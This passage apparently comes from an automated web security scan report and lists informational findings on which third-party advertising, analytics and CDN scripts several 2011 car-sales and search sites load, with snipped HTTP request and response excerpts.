Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:44:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:44:00 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62665

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
E668C-9F93-BF8A-30A0569CC14F30D7|||13148|||;sz=728x90;ptile=1;!cat=;ord=54427565?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||481E668C-9F93-BF8A-30A0569CC14F30D7|||13148|||;sz=728x90;ptile=1;!cat=;ord=54427565?"></SCRIPT>
...[SNIP]...
68C-9F93-BF8A-30A0569CC14F30D7|||13148|||;sz=160x600;ptile=2;!cat=;ord=54427565?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||481E668C-9F93-BF8A-30A0569CC14F30D7|||13148|||;sz=160x600;ptile=2;!cat=;ord=54427565?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.547. http://www.autobytel.com/new-cars.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/new-cars.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.research/rhp;abr=!ie;kw=rhp;info=13148;dcopt=ist;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=728x90;ptile=1;!cat=;ord=38178938?
http://ad.doubleclick.net/adj/abtl.research/rhp;abr=!ie;kw=rhp;info=13148;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=160x600;ptile=3;!cat=;ord=38178938?
http://ad.doubleclick.net/adj/abtl.research/rhp;abr=!ie;kw=rhp;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=300x250;ptile=2;!cat=;ord=38178938?
http://ad.doubleclick.net/adj/abtl.research/rhp;kw=rhp;info=13148;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=1x3;!cat=;ord=38178938?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:24 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:24 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104069

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=728x90;ptile=1;!cat=;ord=38178938?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/rhp;abr=!ie;kw=rhp;info=13148;dcopt=ist;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=728x90;ptile=1;!cat=;ord=38178938?"></SCRIPT>
...[SNIP]...
F-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=300x250;ptile=2;!cat=;ord=38178938?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/rhp;abr=!ie;kw=rhp;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=300x250;ptile=2;!cat=;ord=38178938?">
               </SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/rhp;kw=rhp;info=13148;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=1x3;!cat=;ord=38178938?"></script>
...[SNIP]...
8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=160x600;ptile=3;!cat=;ord=38178938?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/rhp;abr=!ie;kw=rhp;info=13148;u=|||480FA8AF-D826-8F7B-FDB4CC6EAAC9BEC4|||13148|||;sz=160x600;ptile=3;!cat=;ord=38178938?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.548. http://www.autobytel.com/repair-cost-calculator/my-garage.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/repair-cost-calculator/my-garage.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:49:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:49:49 GMT
Content-Length: 22180
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:49:48 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.549. http://www.autobytel.com/sitemap/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/sitemap/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:50:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:50:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:50:56 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 51371

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.550. http://www.autobytel.com/used-cars.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/used-cars.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.used/uhp;abr=!ie;kw=uhp;info=13148;dcopt=ist;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=728x90;ptile=1;!cat=;ord=95298533?
http://ad.doubleclick.net/adj/abtl.used/uhp;abr=!ie;kw=uhp;info=13148;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=160x600;ptile=3;!cat=;ord=95298533?
http://ad.doubleclick.net/adj/abtl.used/uhp;abr=!ie;kw=uhp;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=300x250;ptile=2;!cat=;ord=95298533?
http://ad.doubleclick.net/adj/abtl.used/uhp;kw=uhp;info=13148;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=1x3;!cat=;ord=95298533?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=no&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:45:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:45:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:45:33 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:45:33 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 79078

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=728x90;ptile=1;!cat=;ord=95298533?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.used/uhp;abr=!ie;kw=uhp;info=13148;dcopt=ist;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=728x90;ptile=1;!cat=;ord=95298533?"></SCRIPT>
...[SNIP]...
B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=300x250;ptile=2;!cat=;ord=95298533?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.used/uhp;abr=!ie;kw=uhp;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=300x250;ptile=2;!cat=;ord=95298533?">
               </SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.used/uhp;kw=uhp;info=13148;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=1x3;!cat=;ord=95298533?"></script>
...[SNIP]...
65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=160x600;ptile=3;!cat=;ord=95298533?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.used/uhp;abr=!ie;kw=uhp;info=13148;u=|||482CA65B-AD47-FB1A-CD2E3C8A239AA0F9|||13148|||;sz=160x600;ptile=3;!cat=;ord=95298533?">
       </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=no&type=&ins=no"></SCRIPT>
...[SNIP]...

21.551. http://www.autobytel.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

GET /x22 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23119
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 16:04:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 16:04:10 GMT
Connection: close
Set-Cookie: cweb=JONQJVS10.4.128.184CKMMK; path=/
Set-Cookie: USER_UUID_VCH=37AC631C%2DE9D5%2DFD37%2DEDAF61EB5BA1725D;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2008%3A03%3A09%27%7D;path=/
Set-Cookie: COUNT=1;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2012%3A04%3A09%27%7D;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=1;path=/




  


       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.552. http://www.autocheck.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autocheck.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.googleadservices.com/pagead/conversion.js
https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/connection/connection-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/event/event-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.6.0/build/yahoo/yahoo-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /?WT.mc_id=1824&siteID=1824 HTTP/1.1
Host: www.autocheck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.553. http://www.autotrader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/interface/MarketManager.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/util.js?v=3.17.167500
http://www.autotraderstatic.com/inc/global.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/ATC/ATC.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/ATC/utils/biUtils.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/Tabber.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/UltraPop.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/base64.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/fixBKms.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/anim-tabs-player.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/anim-tabs.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/homepage-b-script.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/homepage-review-selector.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/myAtcUtil.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/homepage/newCarSelectionform.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/iepng.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500
http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500
http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500
http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500
http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:56:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=4C16AC510625457D15A58A2D4558BCD7; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Tue, 31-Jan-2012 23:56:28 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerAT-Production_hhtp=3526518282.61475.0000; path=/
Content-Length: 59997

<!DOCTYPE html P
...[SNIP]...
</style>

<script src="http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500" type="text/javascript"></script>

<script type="text/javascript" src="http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500"></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500"></script>
...[SNIP]...
</script>

<script src="http://www.autotraderstatic.com/inc/global.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/inc/js/Tabber.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/myAtcUtil.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/UltraPop.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/iepng.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/fixBKms.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/interface/ModelSearchUtil.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://www.autotraderstatic.com/dwr/interface/MarketManager.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/dwr/util.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/ATC/ATC.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/ATC/utils/biUtils.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/homepage-review-selector.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/newCarSelectionform.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/homepage-b-script.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/base64.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
</a>

<script type="text/javascript" src="http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500"></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500'></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500'></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500"></script>
...[SNIP]...
</ul>

<script src="http://www.autotraderstatic.com/inc/js/homepage/anim-tabs.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/homepage/anim-tabs-player.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...

21.554. http://www.autotrader.com/hornav/trader/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/hornav/trader/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://cetrk.com/pages/scripts/0006/4068.js
http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500
http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500
http://www.autotraderstatic.com/hornav/js/fsbo-survey.js?v=3.17.167500
http://www.autotraderstatic.com/hornav/js/fsbo_landing_page.js?v=3.17.167500
http://www.autotraderstatic.com/hornav/js/sellyourcar-english_mtagconfig.js?v=3.17.167500
http://www.autotraderstatic.com/inc/global.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500
http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500
http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500
http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500
http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500
http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:56:10 GMT
Server: Apache
Set-Cookie: JSESSIONID=D94B6DD5A6F34AF02DDCF09FF98C7E8B; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Tue, 31-Jan-2012 23:56:10 GMT; Path=/
Set-Cookie: ac_afflt=; Path=/
Content-Language: en
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: BIGipServerAT-Production_hhtp=2167563786.61475.0000; path=/
Content-Length: 43738

<birf:pageLoad pg="syc_lp"></birf:pageLoad>
<script type="text/javascript">
BIRFPageData = {
pg_inst:
...[SNIP]...
<link rel="stylesheet" href="http://www.autotraderstatic.com/inc/css/fsbo/new-gen-syc.css?v=3.17.167500" type="text/css" />

<script src="http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500" type="text/javascript"></script>

<script type="text/javascript" src="http://www.autotraderstatic.com/js/jquery-1.3.2.min.js?v=3.17.167500"></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/js/jqueryui/js/jquery-ui-1.7.2.custom.min.js?v=3.17.167500"></script>
...[SNIP]...
</script>

<script src="http://www.autotraderstatic.com/inc/global.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/hornav/js/fsbo_landing_page.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/hornav/js/fsbo-survey.js?v=3.17.167500" type="text/javascript"></script>
<script src="http://www.autotraderstatic.com/inc/js/prototype/prototype.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/inc/js/atcbi.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/onlineopinion/onlineopinion3t.js?v=3.17.167500" type="text/javascript"></script>

<script src="http://www.autotraderstatic.com/cms/test_and_target/mbox.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.autotraderstatic.com/js/plugins/bgiframe_2.1.1/jquery.bgiframe.min.js?v=3.17.167500"></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/engine.js?v=3.17.167500'></script>
<script type='text/javascript' src='http://www.autotraderstatic.com/dwr/interface/UserMsgController.js?v=3.17.167500'></script>
<script type="text/javascript" src="http://www.autotraderstatic.com/inc/js/myatc/notifications.js?v=3.17.167500"></script>
...[SNIP]...
</script>

<script src="http://www.autotraderstatic.com/hornav/js/sellyourcar-english_mtagconfig.js?v=3.17.167500" type="text/javascript"></script>
...[SNIP]...
</iframe>

<script type="text/javascript" src="http://cetrk.com/pages/scripts/0006/4068.js"> </script>
...[SNIP]...

21.555. http://www.backtype.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.backtype.com
Path:	/search

Issue detail

The response dynamically includes the following script from another domain:

http://api.mixpanel.com/site_media/js/api/mixpanel.js

Request

GET /search HTTP/1.1
Host: www.backtype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 23:56:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: BT=bb2426ba4c18241d1545e90dfa404f4a; expires=Wed, 23-Feb-2011 23:56:54 GMT; path=/; domain=.backtype.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3713

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <title>Sorry —
...[SNIP]...
<![endif]-->
   <script src="http://api.mixpanel.com/site_media/js/api/mixpanel.js" type="text/javascript"></script>
...[SNIP]...

21.556. http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072 previous next

Summary

Severity:	Information
Confidence:	Certain
